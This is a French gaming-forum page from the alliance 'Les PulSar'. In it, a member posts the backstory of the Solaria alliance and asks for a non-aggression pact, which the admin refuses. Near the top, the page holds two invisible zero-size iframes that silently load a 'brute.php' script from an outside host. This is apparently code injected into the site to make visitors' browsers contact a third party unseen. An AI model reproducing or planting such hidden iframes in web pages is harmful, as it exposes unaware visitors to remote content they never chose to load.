Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
-55%
Le deal à ne pas rater :
Friteuse sans huile – PHILIPS – Airfryer HD9200/90 Série 3000
49.99 € 109.99 €
Voir le deal

 

 histoire desolaria et demande diplomatique

Aller en bas 
2 participants
AuteurMessage
gloomy




Messages : 3
Date d'inscription : 25/08/2009

histoire desolaria et demande diplomatique Empty
MessageSujet: histoire desolaria et demande diplomatique   histoire desolaria et demande diplomatique Icon_minitimeMar 25 Aoû - 8:05

Histoire du peuple de Solaria



Il y a fort longtemps il existait une planète nommée Solaria. C’était l’une des planètes les plus prospères de tout l’univers. Elle possédait une flotte gigantesque, le plus grand savoir et ses colonies étaient dans tout l’univers. Le peuple de cette planète était neutre et ne combattait que pour se défendre.

Tout allait bien sur Solaria jusqu’au jour où un ennemi inconnu, que l'on surnommait l’empereur noir, fit son apparition. Son but n’était pas de piller les ressources des autres planètes ou encore de prendre le contrôle d’un système solaire, mais d'anéantir toute vie sur son passage jusqu'à devenir le maître de l’univers. Pour empêcher que l’empereur noir ne détruise toutes les civilisations, les plus grandes alliances de l’univers s’allièrent et rassemblèrent leurs flottes pour la bataille finale contre l’empereur noir. Les dirigeants de Solaria décidèrent qu’ils ne participeraient pas à l’attaque car ils préféraient rester en réserve au cas où la bataille tournerait mal.

L’armée qui se rassemblait était 2 fois plus grande que la flotte de l’empereur noir. Elle avait comme mission de se rendre sur la planète mère de l'ennemi, d'anéantir toute la flotte s'y trouvant et de tuer l’empereur noir. Les alliances pensaient pouvoir le battre sans trop de difficulté.

Hélas leur témérité leur couta de nombreuses vies. L’empereur avait prévu leur attaque, il avait réussi à caché ses vaisseaux pour que les alliances ne découvrent pas qu’il possédait une flotte presque aussi importante que la leur.

Quand les alliances alliées sont arrivées sur place elles ont rapidement découvert la supercherie. Les alliances les plus petites prirent la fuite devant cette armada tandis que certaines hésitèrent à attaquer. La grande armée des alliances était complètement désorganisée.
Vagues après vagues ils se faisaient détruire, mais un groupe de commandos d’élite réussi néanmoins à se poser sur la planète pour essayer de tuer l’empereur noir. Ils avaient réussi à atteindre la salle du trône, mais elle était vide. L’empereur avait fuit avant même que la bataille ne commence.

En fin de compte, l’armée des alliés réussis à vaincre la flotte de l’empereur noir mais il n’y restait que quelques vaisseaux qui regagnèrent leurs planètes d’origine. Beaucoup de peuples disaient que c’était en partie de la faute de Solaria si ils avaient perdu tant des leurs. Les dirigeants de Solaria faisaient la sourde oreille à ces allégations.

Beaucoup de personnes recherchèrent par la suite l’empereur noir dans le but de lui faire payer ses crimes, mais personne ne le trouva. Il s’était retiré dans un coin sombre de l’univers pour refaire sont armée.

Au bout de quelques décennies, il décida de repasser à l’action. Il concentra sa première attaque sur la seule planète encore capable de le battre : Solaria.

Pour l’attaquer, il devait traverser une bonne partie de l’univers et savait qu’il serait repéré mais il ne s'en souciait pas car une fois Solaria détruite plus rien ne s’opposerait à sont désir de prendre le contrôle de l’univers.

Mais les peuples qui repérèrent cette armée ne passèrent pas le message à Solaria pour se venger de leur lâcheté. L’empereur noir pris donc par surprise Solaria. Elle n’était pas préparée à se défendre. Solaria tomba assez rapidement mais quelques personnes réussir à s’enfuir. L’empereur de Solaria réussit, juste avant de se faire tuer, à actionner l’autodestruction de la planète pour ne pas que leur immense savoir ne tombe entre de mauvaises mains. L’explosion fut si puissante qu'elle détruisit non seulement Solaria mais aussi toute la flotte ennemie et le vaisseau où l’empereur noir se trouvait.

100 ans passèrent. Un des descendant des personnes qui réussirent à fuir de Solaria, nommé Kalleus, eu l’idée de rassembler tous les descendants du peuple de Solaria dans le but de fonder une alliance et de reprendre la place qu’occupait la planète autrefois dans l’univers. Il réussit à retrouver en premier Eldor qui était un grand commerçant. A eux deux, ils retrouvèrent quelques descendant et reformèrent une alliance portant le nom de Solaria.

Kalleus décidant de séparer Solaria en quatre caste qui on chacune un but. Un jour notre commandant dit une phrase qui résume la particularité de chaque caste. la voici :
Que la LUMIERE nous guide, que la TERRE nous
soutienne, que l'EAU nous équilibre, que l'AIR nourrisse notre avenir,
et que le FEU vous brûle.
Cette phrase est maintenant notre devise.

Au bout de quelque temps, Kalleus et Eldor partirent dans un coin reculé de l’univers pour finir leur jours en paix mais n’ayant jamais réellement réussi à faire de Solaria une grande puissance.

Dark Link, plus déterminé que jamais, fut le successeur, nommé par Kalleus et approuvé par Eldor, de Solaria.
Aujourd’hui encore, il continu à appliquer ce que notre fondateur avait commencé.


Avec un meneur comme Dark Link et la sagesse de la castre de lumière, Solaria a de beaux jours de gloire devant elle…


devise :

Que la LUMIERE nous guide, que la TERRE nous
soutienne, que l'EAU nous équilibre, que l'AIR nourrisse notre avenir,
et que le FEU vous brûle.
Revenir en haut Aller en bas
gloomy




Messages : 3
Date d'inscription : 25/08/2009

histoire desolaria et demande diplomatique Empty
MessageSujet: Re: histoire desolaria et demande diplomatique   histoire desolaria et demande diplomatique Icon_minitimeMar 25 Aoû - 8:10

salut a tous je suis ici en temps que diplomate de l'alliance solaria

je sais l'alliance est pas très très bien classer mais elle se défend bien

êtes vous disposer a avoir un pacte avec mon alliance ???
( pas un pacte total car sa ferai que vous désavantager )

je souhaite surtout faire un pacte de non agression ou pacte amicaux se qui reviens au même

Embarassed
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

histoire desolaria et demande diplomatique Empty
MessageSujet: Re: histoire desolaria et demande diplomatique   histoire desolaria et demande diplomatique Icon_minitimeMar 25 Aoû - 16:51

Bonjour à toi et bienvenue sur notre fofo

Sinon quand à la demande de pacte elle sera refusé, car nous ne faisons aucun pacte désolé Wink, de plus un pacte avec vous ne nous avancerais a rien, vous ne faite que demandé notre protection...
Revenir en haut Aller en bas
gloomy




Messages : 3
Date d'inscription : 25/08/2009

histoire desolaria et demande diplomatique Empty
MessageSujet: Re: histoire desolaria et demande diplomatique   histoire desolaria et demande diplomatique Icon_minitimeMar 25 Aoû - 17:39

bbbbbbbbb si vous faite pas de pacte ......


sinon je demande pas votre protection du fait que je ne demande pas un pacte total
les seul qui peut faire que je demande votre aide

non moi je voulez juste un pacte de non agression qui signifie que les membre de l'alliance pulsar attaque pas les membre de solaria
Revenir en haut Aller en bas
Contenu sponsorisé





histoire desolaria et demande diplomatique Empty
MessageSujet: Re: histoire desolaria et demande diplomatique   histoire desolaria et demande diplomatique Icon_minitime

Revenir en haut Aller en bas
 
histoire desolaria et demande diplomatique
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Ambassade-
Sauter vers: